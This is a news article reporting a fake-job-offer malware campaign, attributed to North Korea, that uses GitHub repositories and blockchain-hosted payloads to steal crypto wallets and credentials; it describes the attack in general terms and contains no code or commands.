Fake GitHub job Offers Trigger Omnistealer Malware Attack Stealing Crypto, Passwords and Global Credentials
A sophisticated cyberattack chain disguised as a routine freelance job offer has exposed security issues. Researchers are calling it one of the most dangerous malware frameworks yet seen in the crypto ecosystem. The operation, linked to North Korean hacking groups, uses fake recruitment pitches and hidden GitHub code to infiltrate systems and drain digital assets globally.
Fake Jobs, Real Attack Chain
The incident began when Crystal Intelligence’s then-vice president of engineering received a LinkedIn message offering freelance web development work. Suspicious of the request, he examined the GitHub repository and uncovered a concealed attack chain designed to evade detection by unsuspecting developers.
The code, once executed, interacts with TRON and Aptos blockchains and uses them as routing layers to ultimately fetch malicious payloads from the Binance Smart Chain. According to Nick Smart, Crystal Intelligence’s chief intelligence officer, this layered approach forms a cascading structure that delivers “the final form malicious code.”
“It Literally Steals Everything”
Security researchers at Ransom-ISAC have dubbed the malware “Omnistealer” due to its wide-ranging capabilities. “It literally steals everything,” said Ellis Stannard, a core member of the group. The malware works with over 60 crypto wallet extensions that include MetaMask and Coinbase together with major web browsers and password management tools and cloud storage services.
This means attackers are not just targeting crypto holdings but also full digital identities, including corporate credentials and sensitive enterprise data.
Blockchain as a Permanent Weapon
Investigators found that parts of the malware were embedded in blockchain transactions, effectively making them immutable and difficult to remove. This allows dormant malicious code to be activated long after initial deployment, creating what experts describe as a “sleeping attack infrastructure.”
Ransom-ISAC researchers compared its scale to the WannaCry ransomware outbreak but warned this campaign could be significantly larger and harder to contain.
North Korea Link and Global Exposure
The investigators followed the investigation to discover that the attackers operated from IP addresses that had previous connections to North Korean state-sponsored activities that were known to use Vladivostok as their base. The investigators estimate that nearly 300000 credentials have been stolen from cybersecurity companies, defense contractors, and government organizations across different nations.
Key Takeaways
The attackers primarily mask themselves as recruiters and freelance developers to attack contractors who execute their malicious code. South Asia serves as a prime target for attackers who seek to exploit regions with substantial developer populations and extensive cryptocurrency usage.
The campaign demonstrates how cyber warfare has developed into a new threat that combines job offers with open-source code and blockchain systems to create an extensive attack network. Researchers announce that the danger has increased because they have not found any specific objectives to which they can work.
